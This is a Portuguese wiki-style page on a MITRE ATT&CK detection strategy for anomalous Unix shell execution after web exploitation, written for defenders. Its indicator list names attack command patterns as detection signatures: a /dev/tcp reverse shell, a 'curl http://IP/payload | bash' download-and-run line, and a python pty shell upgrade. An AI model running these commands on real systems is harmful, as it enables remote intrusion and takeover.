det0384-behavioral-detection-of-unix-shell-execution

# DET0384 — Behavioral Detection of Unix Shell Execution ## Descrição A execução de shells Unix (`bash`, `sh`, `zsh`, `dash`, `ksh`) em contextos anômalos é um indicador frequente de exploração bem-sucedida, movimentação lateral, persistência ou execução de payload pós-comprometimento em sistemas Linux e macOS. Adversários frequentemente obtêm shells reversos após exploração de vulnerabilidades em servidores web, containers ou serviços expostos, e subsequentemente usam o shell para reconhecimento, download de ferramentas adicionais e estabelecimento de persistência. A detecção comportamental foca em anomalias de linhagem de processo: um shell `bash` iniciado como filho de `apache2`, `nginx`, `java` ou `python` (servidores de aplicação) é fortemente indicativo de Remote Code Execution (RCE). Similarmente, shells executados com `-i` (interativo) ou `-c "comando"` contendo downloads de URLs, modificação de cron, ou criação de backdoors SSH em authorized_keys são sinais de pós-exploração. Ferramentas como [[Metasploit]] (`shell_reverse_tcp`), [[s0154-cobalt-strike|Cobalt Strike]] e exploits de CVEs web recorrentes no Brasil (como [[cve-2023-44487|CVE-2023-44487]] e vulnerabilidades em frameworks PHP) frequentemente resultam nesse padrão. A estratégia monitora criação de processos shell por pais incomuns, argumentos de shell com características de shell reverso, e correlação com tentativas de acesso de rede recentes ao servidor comprometido. ## Indicadores de Detecção - `bash`, `sh` ou `dash` executado como filho de processo de servidor web (`httpd`, `nginx`, `java`, `php`) - Shell com argumento `-i` ou `>& /dev/tcp/IP/PORT` (shell reverso netcat/bash) - Shell executado em TTY sem terminal correspondente (shell obtido via exploit sem sessão interativa) - `bash -c "curl http://IP/payload | bash"` ou equivalente (download e execução em linha única) - Criação de processo shell com UID de serviço (www-data, nobody, apache) realizando operações de persistência - `python -c "import pty; pty.spawn('/bin/bash')"` ou similar para upgrade de shell (técnica de post-exploitation) ## Técnicas Relacionadas - [[T1059004-unix-shell|T1059.004 — Unix Shell]] - [[t1059-command-and-scripting-interpreter|T1059 — Command and Scripting Interpreter]] - [[t1190-exploit-public-facing-application|T1190 — Exploit Public-Facing Application]] - [[t1133-external-remote-services|T1133 — External Remote Services]] - [[T1505003-web-shell|T1505.003 — Web Shell]] ## Analytics Relacionadas - [[an1081-analytic-1081|AN1081 — Analytic 1081]] - [[an1082-analytic-1082|AN1082 — Analytic 1082]] - [[an1083-analytic-1083|AN1083 — Analytic 1083]] - [[an1084-analytic-1084|AN1084 — Analytic 1084]] --- *Fonte: [MITRE ATT&CK — DET0384](https://attack.mitre.org/detectionstrategies/DET0384)*